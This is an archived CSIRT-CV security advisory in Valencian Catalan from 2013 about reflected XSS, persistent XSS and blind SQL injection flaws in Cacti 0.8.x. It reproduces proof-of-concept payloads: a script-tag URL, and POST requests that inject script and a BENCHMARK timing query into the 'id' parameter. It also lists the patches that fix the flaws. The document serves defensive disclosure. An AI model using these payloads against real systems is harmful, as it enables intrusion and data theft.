CSIRTCV

Está usted visitando una publicación en la hemeroteca de CSIRT-CV.
Para acceder al portal y contenido actual, visite https://www.csirtcv.gva.es

03/09/2013

Múltiples vulnerabilitats a Cacti

S’han corregit múltiples errors de seguretat en l’última versió de Cacti (0.8.8b). Els errors es corresponen amb una falta de filtratge adequat en els paràmetres d’entrada que podrien permetre a un atacant injectar-hi codi Javascript i SQL.

Risc: Alt

Cacti és un programari especialment dissenyat per a crear gràfiques de monitorització per mitjà de les dades obtingudes per diferents ferramentes que fan servir l'estàndard RRDtool. És un dels sistemes de creació de gràfiques més comuns en el món de l’administració de sistemes i pot trobar-se com a part fonamental d’altres programes.

Els errors es detallen a continuació:

El paràmetre step de la pàgina "/install/index.php" seria vulnerable a XSS reflectit.

Exemple:
http://<IP>/cacti/install/index.php?x=52&i=21&step="><script>alert(12345)</script>

En este cas el paràmetre "id" de la pàgina "/cacti/host.php" seria vulnerable a XSS persistent. La següent petició POST servix com a prova de concepte:

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

id=<script>alert(12345)</script>&save_component_host=1&action=save

Una vegada feta la petició anterior, accedim a

http://<IP>/cacti/utilities.php?tail_elets=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile

i podrem vore la finestra emergent que demostra el XSS.

El paràmetre "id" de la pàgina "/install/index.php" seria, a més, vulnerable a una injecció sql cega , açò es deu al fet que no es filtra correctament este paràmetre quan se'l passa a la funció api_device_save() del script lib/api_device.php. Fem servir de POC la petició següent:

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save

Sistemes Afectats:

Cacti 0.8.x

Referències:

CVE-2013-5588, CVE-2013-5589

Solució:

S’han publicat pegats que solucionen estos errors i que estan disponibles a través del dipòsit svn de Cacti, concretament les revisions r7420 i r7421.

Notes:

Multiple vulnerabilities in Cacti 0.8.8b and lower
http://bugs.cacti.net/view.php?id=2383

Bug #0002383 : Sanitize the step and id variables
http://svn.cacti.net/viewvc?view=rev&revision=7420
Bug #0002383 : Sanitize the step and id variables same as R#7420 for 089
http://svn.cacti.net/viewvc?view=rev&revision=7421

 

Font: Hispasec una-al-día

CSIRT-CV